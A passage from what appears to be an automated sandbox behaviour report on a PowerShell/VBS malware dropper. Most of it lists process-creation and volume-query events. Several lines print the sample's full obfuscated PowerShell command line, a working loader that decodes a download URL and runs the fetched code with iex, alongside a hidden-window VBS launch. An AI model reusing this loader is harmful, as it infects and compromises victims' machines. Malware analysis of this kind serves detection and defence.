          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Yara detected Powershell download and execute
          Source: Yara matchFile source: amsi64_4904.amsi.csv, type: OTHER
          Source: Yara matchFile source: amsi64_2724.amsi.csv, type: OTHER
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4904, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2724, type: MEMORYSTR
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\vh27dw.vbs'"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\f3j.vbs" Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Succesfulde.blo && echo t"Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'anetholes klosetternes venushaar paralalia unyttigst stokkemetoder scanted129 loftrum243 nondissipatedly smashendes sammenlignings areographer articulant prossies vesiculating supermishap adolfine prostyle exerted torsken vespoid svejsere frotteers kvrulanter anetholes klosetternes venushaar paralalia unyttigst stokkemetoder scanted129 loftrum243 nondissipatedly smashendes sammenlignings areographer articulant prossies vesiculating supermishap adolfine prostyle exerted torsken vespoid svejsere frotteers kvrulanter';if (${host}.currentculture) {$bellisserne++;}function gaardspladsens($agerendes){$dafter135=$agerendes.length-$bellisserne;$unburden='substri';$unburden+='ng';for( $unminimizing=5;$unminimizing -lt $dafter135;$unminimizing+=6){$anetholes+=$agerendes.$unburden.invoke( $unminimizing, $bellisserne);}$anetholes;}function sanktionjtr($epigyne){ . ($emanciperingerne) ($epigyne);}$forlngelsers=gaardspladsens 'ol ermtyvekodi.elzcoenoi fronl heldl.nfusanatro/e.cam5unbri.avlsh0koord fo.b(po.omw acceifravrnamentd unpuorealkw zoonsmyxom .ejsn .hudtrecor unend1turne0,npow.zymoc0dacty;predo f,skewantipiseptingu,gn6kundg4brn,b;colla overixforsy6af ta4 malt;fo.ew lawserprepov kom,:barnl1for e2incom1tom,t.te,eo0alloc)b.ytk vill,g skyte retrc kldnk maveochili/l.tre2redis0nazil1tling0c rci0zitta1trkas0nonco1 slu selecfm.ssaiskyd rsi ine ampf .ostochevixdemob/trodd1und.r2ser m1earmu.stra,0exagg ';$fangstknivens=gaardspladsens 'imparupremosaromaeballar unfr-lect,apliengripo,e excenrubritdefin ';$unyttigst=gaardspladsens 'afvrgh danstallesth.stepkommesbevi,: k.nt/dosme/ forgwiter.wpal mwneur..houslavagarlc ccymklovnr hemawannelaskjerd.ndta. svrvcunkinosultampimps/,tammwparanh skva/sp.cksunin,ulo hiborgieostorkrsamtadoptrnitap.lnresunecommerpaxone,hapengowlkdpingeerokkes,usti7affld8unem..,eadmsunharmde eniv,nre>microhforlotsteretkniplpkonklstillg:lingu/rengr/ dimyw susiwbreg.w,onst. samle domsrggepupargui-appelrn,rmaoopryky ethea akkrlgarvk-protoc kandrno.atofe tswfejlmnmesop. decaiembaln irkefresteoanh l/ cifrwchanchattak/,adios alaru.ountbindlsoparaprpian.d scrai thorns.ptiefin.irk ntaechantnvegetd fingei,glosguden7 bekr8abrik.,ydroskri sm lddeim.tte ';$deaktiverende=gaardspladsens 'panor> atol ';$emanciperingerne=gaardspladsens 'bru.hiblideerut,exfyl e ';$almengjordes='loftrum243';$cometlike = gaardspladsens ' h lvequ,drcrespohsura,osniff teser%subcha klunpkun.tptaagedflotaacr.sst tvanacox c%d.mss\auruns nforuskrmscsv jncaiz,eegreensanthof fjerudisjolveksedlitogeblod.. sub,bcentrlteksto olle lati&ultra&tamar sandieophthct ndah c.gaoafplu familtslidb ';sanktionjtr (gaardspladsens 'isos.$impregarri.ltombaorossabgast aso,thlprede:.eseruhanged disksautoomsbeopekontolwretctincrenberigimenzino,eirgded gepurifn ho o=w ter( gam,creto.m excadeloin unch/ ami callit rekvi$obolec stavosuppemsevereunmantthromloghamices,ok rekoe
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'anetholes klosetternes venushaar paralalia unyttigst stokkemetoder scanted129 loftrum243 nondissipatedly smashendes sammenlignings areographer articulant prossies vesiculating supermishap adolfine prostyle exerted torsken vespoid svejsere frotteers kvrulanter anetholes klosetternes venushaar paralalia unyttigst stokkemetoder scanted129 loftrum243 nondissipatedly smashendes sammenlignings areographer articulant prossies vesiculating supermishap adolfine prostyle exerted torsken vespoid svejsere frotteers kvrulanter';if (${host}.currentculture) {$bellisserne++;}function gaardspladsens($agerendes){$dafter135=$agerendes.length-$bellisserne;$unburden='substri';$unburden+='ng';for( $unminimizing=5;$unminimizing -lt $dafter135;$unminimizing+=6){$anetholes+=$agerendes.$unburden.invoke( $unminimizing, $bellisserne);}$anetholes;}function sanktionjtr($epigyne){ . ($emanciperingerne) ($epigyne);}$forlngelsers=gaardspladsens 'ol ermtyvekodi.elzcoenoi fronl heldl.nfusanatro/e.cam5unbri.avlsh0koord fo.b(po.omw acceifravrnamentd unpuorealkw zoonsmyxom .ejsn .hudtrecor unend1turne0,npow.zymoc0dacty;predo f,skewantipiseptingu,gn6kundg4brn,b;colla overixforsy6af ta4 malt;fo.ew lawserprepov kom,:barnl1for e2incom1tom,t.te,eo0alloc)b.ytk vill,g skyte retrc kldnk maveochili/l.tre2redis0nazil1tling0c rci0zitta1trkas0nonco1 slu selecfm.ssaiskyd rsi ine ampf .ostochevixdemob/trodd1und.r2ser m1earmu.stra,0exagg ';$fangstknivens=gaardspladsens 'imparupremosaromaeballar unfr-lect,apliengripo,e excenrubritdefin ';$unyttigst=gaardspladsens 'afvrgh danstallesth.stepkommesbevi,: k.nt/dosme/ forgwiter.wpal mwneur..houslavagarlc ccymklovnr hemawannelaskjerd.ndta. svrvcunkinosultampimps/,tammwparanh skva/sp.cksunin,ulo hiborgieostorkrsamtadoptrnitap.lnresunecommerpaxone,hapengowlkdpingeerokkes,usti7affld8unem..,eadmsunharmde eniv,nre>microhforlotsteretkniplpkonklstillg:lingu/rengr/ dimyw susiwbreg.w,onst. samle domsrggepupargui-appelrn,rmaoopryky ethea akkrlgarvk-protoc kandrno.atofe tswfejlmnmesop. decaiembaln irkefresteoanh l/ cifrwchanchattak/,adios alaru.ountbindlsoparaprpian.d scrai thorns.ptiefin.irk ntaechantnvegetd fingei,glosguden7 bekr8abrik.,ydroskri sm lddeim.tte ';$deaktiverende=gaardspladsens 'panor> atol ';$emanciperingerne=gaardspladsens 'bru.hiblideerut,exfyl e ';$almengjordes='loftrum243';$cometlike = gaardspladsens ' h lvequ,drcrespohsura,osniff teser%subcha klunpkun.tptaagedflotaacr.sst tvanacox c%d.mss\auruns nforuskrmscsv jncaiz,eegreensanthof fjerudisjolveksedlitogeblod.. sub,bcentrlteksto olle lati&ultra&tamar sandieophthct ndah c.gaoafplu familtslidb ';sanktionjtr (gaardspladsens 'isos.$impregarri.ltombaorossabgast aso,thlprede:.eseruhanged disksautoomsbeopekontolwretctincrenberigimenzino,eirgded gepurifn ho o=w ter( gam,creto.m excadeloin unch/ ami callit rekvi$obolec stavosuppemsevereunmantthromloghamices,ok rekoeJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
